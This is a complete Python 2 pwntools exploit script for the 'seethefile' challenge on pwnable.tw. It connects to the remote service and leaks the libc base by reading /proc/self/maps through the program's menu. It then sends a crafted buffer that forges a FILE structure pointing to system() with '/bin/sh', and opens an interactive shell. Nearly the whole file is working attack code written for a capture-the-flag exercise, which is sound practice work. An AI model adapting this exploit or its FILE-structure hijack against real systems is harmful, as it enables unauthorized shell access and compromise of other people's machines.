from pwn import * | |
# Target binary and the libc shipped with the challenge (Python 2 / pwntools).
main = ELF('./seethefile')
libc = ELF('./libc_32.so.6')

# Fixed 32-bit little-endian addresses used in payloads; they belong to the
# binaries above and are not derived anywhere in this file.
addr = p32(0x8048a37)
filename_addr = p32(0x804B080)
name_addr = p32(0x804B260)

# Filler buffer: NUL-terminated "/bin/sh", six 4-byte letter groups, name_addr,
# two more letter groups, then 100 NUL bytes.  run() builds its own buffer and
# does not reference this one.
payload = (
    '/bin/sh\x00'
    + ''.join(letter * 4 for letter in 'CDEFGH')
    + name_addr
    + ''.join(letter * 4 for letter in 'JK')
    + '\x00' * 100
)
def inset_in_offset(payload, offset, length, data):
    """Return *payload* with the ``length`` bytes at ``offset`` replaced by *data*.

    The slice ``payload[offset:offset + length]`` is dropped and *data* is
    spliced in at ``offset``; the result only keeps its overall length when
    ``len(data) == length``.  Slicing never raises, so an out-of-range
    ``offset`` simply appends or truncates.
    """
    head = payload[:offset]
    tail = payload[offset + length:]
    return head + data + tail
# Local alternative: run the binary under the bundled libc instead of the
# remote service.
# r = main.process(env={'LD_PRELOAD': libc.path})
HOST = "chall.pwnable.tw"
PORT = 10200
# Single pwntools tube shared by every helper below.
r = remote(HOST, PORT)
def open_file(file_name):
    """Select menu option 1 on the shared tube and send *file_name* at the path prompt."""
    message = 'Opening file %s' % file_name
    log.info(message)
    r.sendlineafter(':', '1')
    r.sendlineafter(':', file_name)
def read_file():
    """Select menu option 2 (read the currently opened file) on the shared tube."""
    log.info('Reading file')
    choice = '2'
    r.sendlineafter(':', choice)
def write_file():
    """Select menu option 3 (echo the read buffer back) on the shared tube."""
    log.info('Writing file')
    choice = '3'
    r.sendlineafter(':', choice)
def close_file():
    """Select menu option 4 (close the opened file) on the shared tube."""
    log.info('Closing file')
    choice = '4'
    r.sendlineafter(':', choice)
def exit_program(name):
    """Select menu option 5 and answer the following prompt with *name*.

    *name* is sent verbatim with ``sendlineafter``; the caller is responsible
    for its length and content.
    """
    log.info('Exiting program')
    for answer in ('5', name):
        r.sendlineafter(':', answer)
def leak_libc():
    """Return a libc base address read back from the target's own /proc/self/maps.

    Drives the menu (open, read, write) so the service echoes its mapping
    table, then parses the eight hex digits found 21..13 characters before
    the ``----`` marker.  The ``+ 0x1000`` adjustment is the author's; which
    mapping line it compensates for is not visible from this file.
    """
    open_file("/proc/self/maps")
    read_file()
    write_file()
    echoed = r.recvuntil("----")
    hex_digits = echoed[-21:-13]
    return int(hex_digits, 16) + 0x1000
def run():
    """Leak the libc base, build the 500-byte name buffer and hand the tube to the user.

    Python 2 only: ``str`` is bytes, ``print`` is a statement and
    ``str.encode("hex")`` exists.  The offsets 0x20, 0x94 and 0x108 are
    specific to the challenge binary and are not derived in this file.
    """
    r_payload = "\x00" * 500
    raw_input('Press return to start')

    libc_base = leak_libc()
    system_addr = libc_base + libc.symbols['system']
    print "libc base", hex(libc_base)

    bin_sh = "\x80\x80\x80\x80/;bin/sh\x00"
    # (offset, length, data) splices applied in order; none of them overlap.
    splices = [
        (0x20, 4, name_addr),
        (0, len(bin_sh), bin_sh),
        (0x94, 4, p32(0x804B260 + 0x100)),
        (0x108, 4, p32(system_addr)),
    ]
    for offset, length, data in splices:
        r_payload = inset_in_offset(r_payload, offset, length, data)

    print r_payload.encode("hex")
    exit_program(r_payload)
    r.interactive()
if __name__ == "__main__":
    # Only drive the session when executed as a script, not when imported.
    run()